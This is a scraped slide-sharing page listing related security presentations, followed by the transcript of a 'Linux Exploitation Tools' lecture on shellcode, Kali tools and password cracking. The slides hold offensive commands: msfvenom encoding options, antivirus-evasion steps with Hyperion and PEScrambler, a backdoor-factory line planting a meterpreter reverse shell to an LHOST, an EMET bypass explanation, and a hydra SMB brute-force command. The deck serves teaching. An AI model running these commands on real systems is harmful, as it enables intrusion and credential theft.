Linux Exploitation Tools

Slides:



Advertisements
Similar presentations
Authenticating Users. Objectives Explain why authentication is a critical aspect of network security Explain why firewalls authenticate and how they identify.
Advertisements

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
Password Cracking Lesson 10. Why crack passwords?
1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
CSCI 530 Lab Authentication. Authentication is verifying the identity of a particular person Example: Logging into a system Example: PGP – Digital Signature.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
Defeating public exploit protections (EMET v5.2 and more)
VPN AND SECURITY FLAWS Rajesh Perumal Clemson University.
MIS Week 2 Site:
CIS 450 – Network Security Chapter 8 – Password Security.
Mark Shtern. Passwords are the most common authentication method They are inherently insecure.
How Safe are They?. Overview Passwords Cracking Attack Avenues On-line Off-line Counter Measures.
Penetration Testing 101 (Boot-camp)
FTP Short for File Transfer Protocol, the protocol for exchanging files over the Internet.protocolfilesInternet works in the same way as HTTP for transferring.
CNIT 124: Advanced Ethical Hacking Ch 9: Password Attacks.
Thwarting Remote OS Fingerprinting Eric Kluthe. What is OS fingerprinting? Sending packets, usually ICMP and TCP, and recording the responses that come.
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.
PZAPR Parallel Zip Archive Password Recovery CSCI High Perf Sci Computing Univ. of Colorado Spring 2011 Neelam Agrawal Rodney Beede Yogesh Virkar.
Password cracking Patrick Sparrow, Matt Prestifillipo, Bill Kazmierski.
Remote Access Usages. Remote Desktop Remote desktop technology makes it possible to view another computer's desktop on your computer. This means you can.
Module 1A An Introduction to Metasploit – Based upon Chapter 2 of “Metasploit the Penetration testers guide” Based upon Chapter 2 of “Metasploit the Penetration.
Security Attacks Tanenbaum & Bo, Modern Operating Systems:4th ed., (c) 2013 Prentice-Hall, Inc. All rights reserved.
Databases Kevin Wright Ben Bruckner Group 40. Outline Background Vulnerabilities Log File Cleaning This Lab.
JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.
CSCI 530 Lab Passwords. Overview Authentication Passwords Hashing Breaking Passwords Dictionary Hybrid Brute-Force Rainbow Tables Detection.
LINUX Presented By Parvathy Subramanian. April 23, 2008LINUX, By Parvathy Subramanian2 Agenda ► Introduction ► Standard design for security systems ►
CIS 4930 / CIS 5930 Offensive Computer Security Spring 2014 I only edited it again.
Assignprelim.1 Assignment Preliminaries © 2012 B. Wilkinson/Clayton Ferner. Modification date: Jan 16a, 2014.
Introduction SQL Injection is a very old security attack. It first came into existence in the early 1990's ex: ”Hackers” movie hero does SQL Injection.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
[blank page for bug work-around]
Penetration Testing Exploiting I: Password Cracking
CITA 352 Chapter 6 Enumeration.
Penetration Testing Scanning
Return Oriented Programming
Nessus Vulnerability Scan
Bypassing Antivirus API
Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Protecting Memory What is there to protect in memory?
PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT
MySQL Exploit with Metasploit
A Comprehensive Security Assessment of the Westminster College Unix Lab Jacob Shodd.
Penetration Testing Offline Password Cracking
Network Exploitation Tool
Password Cracking Lesson 10.
Hacking Unix/Linux.
Metasploit a one-stop hack shop
CSC 495/583 Topics of Software Security Stack Overflows (2)
Secure Software Development: Theory and Practice
Laura Jaideny Pérez Gómez - A
Assignment Preliminaries
Digital Forensics 2 (DFC721S)
IIT Indore © Neminah Hubballi
Common Operating System Exploits
CIT 480: Securing Computer Systems
Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.
CSC 495/583 Topics of Software Security Return-oriented programming
Advanced Penetration testing
Advanced Penetration testing
Software Security Lesson Introduction
Kiran Subramanyam Password Cracking 1.
Web Application Penetration Testing ‘17
Metasploit Analysis Report Overview
Cyber Operation and Penetration Testing Online Password Cracking Cliff Zou University of Central Florida.
Web Hacking: Beginners
Cyber Operation and Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack Cliff Zou University of Central Florida.
Crisis and Aftermath Morris worm.
Network Penetration Testing & Defense
Presentation transcript:

Linux Exploitation Tools 1LT George Raileanu

Linux Exploitation Tools Shellcode – Piece of code used as the payload in the exploitation of a software vulnerability. What is a payload? What is an exploit? What is a vulnerability? Reference: https://www.offensive-security.com/vulndev/aix-shellcode-metasploit/ Linux Exploitation Tools

Local Remote Staged Types of Shellcode

Kali Linux What is Kali Linux? Over 300 Programs Nmap Aircrck-ng Kismet Wireshark Metasploit Burp John the Ripper Maltego Armitage OWASP ZAP Reference: http://marthinsen.nu/?p=244 Kali Linux

Reference: http://www. quickmeme Metasploit

https://memegenerator.net/instance/50927099

using msfvenom to generate our shellcode:   -f c (format C / Windows) -a x86 (32 bit OS) -a x86_64 (64 bit OS) -b "\x00\x0a\x0d\x20" (exclude badchars) -e x86/shikata_ga_nai (encode the payload) BAD Characters:   0x00 == NULL Byte: NULL Bytes cause a STRCPY oper to terminate, which can truncate our buffer and ignore our shellcode. 0x0D == Carriage Return: would signify end of PASSWORD field, and terminate the buffer at that point. 0x0A == Line Feed: same reason as the carriage return. 0x20 == Spaces

using EXITFUNC=thread   we keep the system or service we exploited from crashing upon EXIT from our shell.

Exploit Obfuscation SAFE Veil Evasion Framework: ../veil-evasion/hyperion# wine hyperion.exe filein.exe fileout.exe ../veil-evasion/hyperion# mv fileout.exe ../pescrambler/ && cd ../pescrambler/ ../veil-evasion/pescrambler# wine PEScrambler.exe -i fileout.exe -o final.exe BackDoor-Factory: ../backdoor-factory/# ./backdoor.py -f calc.exe -s \ meterpreter_reverse_https_threaded -H <LHOST> -P <LPORT> # if encountered, never use a cave section named 'None'; if no caves are adequate use 'a' to append the backdoor to the binary. but with all the mitigations and prevention mechanisms installed on Win* OSs why would this work? EMET is largely effective at complicating a variety of exploitation techniques in true 32- and 64-bit applications, often requiring attackers to find a solution to each mitigation on a caseby-case basis. Most off-the-shelf exploits will fail in the face of EMET mitigations, however, while EMET provides support for both 32 and 64-bit processes, as a limitation of its design, it does not explicitly handle the special case of WoW64 processes. This makes using a 64-bit ROP chain and secondary stage a relatively straightforward method for bypassing a significant number of EMET’s mitigations. Furthermore, 64-bit editions of EMET do not support any of the ROP-related mitigations.

EXE2HEX: ../exe2hex/# python3 exe2hex.py -x /tmp/safe.exe ../exe2hex/# ./exe2hex.py -x /tmp/nc.exe -b /tmp/safe.txt ../exe2hex/# cat /tmp/calc.exe | python3 exe2hex.py -s -b safe.bat -p safe.cmd Methods/OS Support • DEBUG.exe (BATch mode -b ) ◦Every version of Windows x86 (No x64 support). ◦Useful for legacy ver of Windows (e.g. XP/2000). ◦limitation of 64k file size for binary files. • PowerShell (PoSh mode -p ) ◦Supports both Windows x86 & x64. ◦Aimed at more "recent" versions of Windows. ◦Powershell was first integrated into core OS with Windows 7/Windows Server 2008 R2. ◦Windows XP SP2, Windows Server 2003 & Windows Vista requires PowerShell to be pre-installed. ◦This is not a .ps1 file (pure powershell). It only calls powershell at the end to convert.

Password Cracking: Password Guessing: Rainbow Tables: Obtain encrypted/hashed passwords, and guess, decrypt, or compare on offline system. Usually much faster than password guessing. Password Guessing: Attempts to actually login to target system . . Likely generates alot of traffic and logs, and likely to lockout attempted user account(s). Much slower than pass cracking. Rainbow Tables: Reference: https://memegenerator.net/instance/59512480

SALT SALT Edit the password algorithm used in Linux: $ nano /etc/pam.d/common-pasword we can change it to sha256, sha512, etc. $ openssl passwd -1 salt ABCD1234 password SALT SALT

hydra -L users.txt -P passwords.txt -v -o out 192.168.217.192 smb